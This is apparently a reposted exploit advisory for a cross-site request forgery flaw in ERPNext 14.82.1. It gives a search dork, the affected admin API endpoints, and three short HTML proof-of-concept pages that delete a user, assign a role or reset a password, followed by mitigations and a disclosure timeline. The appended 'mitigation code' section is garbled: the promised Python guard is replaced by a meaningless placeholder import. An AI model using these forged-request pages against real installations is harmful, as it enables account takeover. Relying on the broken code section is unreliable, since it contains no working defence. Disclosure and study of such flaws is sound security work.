ERPNext 14.82.1 Account Takeover via Cross-Site Request Forgery (CSRF)
ERPNext 14.82.1 and earlier contain a CSRF vulnerability that lets an attacker use forged requests to delete users, assign roles or reset passwords, leading to account takeover. Recommended fixes include enabling CSRF protection, restricting critical operations to the POST method and marking cookies SameSite. 2025-5-6 20:38:52 Author: cxsecurity.com (view original)

# Exploit Title: ERPNext 14.82.1 - Account Takeover via Cross-Site Request Forgery (CSRF)
# Google Dork: inurl:"/api/method/frappe"
# Date: 2025-04-29
# Exploit Author: Ahmed Thaiban (Thvt0ne)
# Vendor Homepage: https://erpnext.com
# Software Link: https://github.com/frappe/erpnext
# Version: <= 14.82.1, 14.74.3 (Tested)
# Tested on: Linux (Ubuntu 20.04), Chrome, Firefox.
# CVE : CVE-2025-28062
# Category: WebApps

# Description:
A Cross-Site Request Forgery (CSRF) vulnerability leading to account takeover exists in ERPNext 14.82.1 and 14.74.3. The flaw allows an attacker to perform unauthorized state-changing operations on behalf of a logged-in administrator without their knowledge or consent.

Affected endpoints include:
- /api/method/frappe.desk.reportview.delete_items
- /api/method/frappe.desk.form.save.savedocs

Impact:
- Deletion of arbitrary users
- Unauthorized role assignment
- Account takeover via password change

The application fails to enforce CSRF tokens on administrative API requests, violating OWASP recommendations.
---
# PoC 1: Delete a User

<html>
<body>
<h2>Delete User</h2>
<a href="http://target/api/method/frappe.desk.reportview.delete_items?items=%5B%221%401.com%22%5D&doctype=User">
Click Here
</a>
</body>
</html>

---
# PoC 2: Assign Role

<html>
<body>
<h2>Assign Role to User</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Add Role
</a>
</body>
</html>

---
# PoC 3: Reset Password

<html>
<body>
<h2>Reset User Password</h2>
<a href="http://target/api/method/frappe.desk.form.save.savedocs?doc=REDACTED_JSON&action=Save">
Reset Password
</a>
</body>
</html>

---
# Mitigation:
- Enforce CSRF protection for all administrative endpoints
- Require POST methods for state changes
- Mark cookies as SameSite=Strict
- Implement re-authentication for critical user changes

---
# Disclosure Timeline:
- 2025-02-09: Vulnerability discovered
- 2025-02-10: Reported to Frappe (no response)
- 2025-04-29: Public disclosure via CVE + advisory

---
# Author Contact:
LinkedIn: https://linkedin.com/in/ahmedth
GitHub: https://github.com/Thvt0ne

# References:
- https://owasp.org/www-community/attacks/csrf
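The first three mitigations above, worked through as an added server-side guard (example code written for this page, not ERPNext's or Frappe's own implementation): state-changing API methods are refused over GET, must echo a per-session token in a request header, and the session cookie is issued with SameSite=Strict. The method allow-list, the `X-CSRF-Token` header name and the request/cookie shapes are assumptions for the illustration.

```python
import hmm_placeholder_never_used  # noqa: F401 (placeholder removed below)
```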



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025050016
如有侵权请联系:admin#unsafe.sh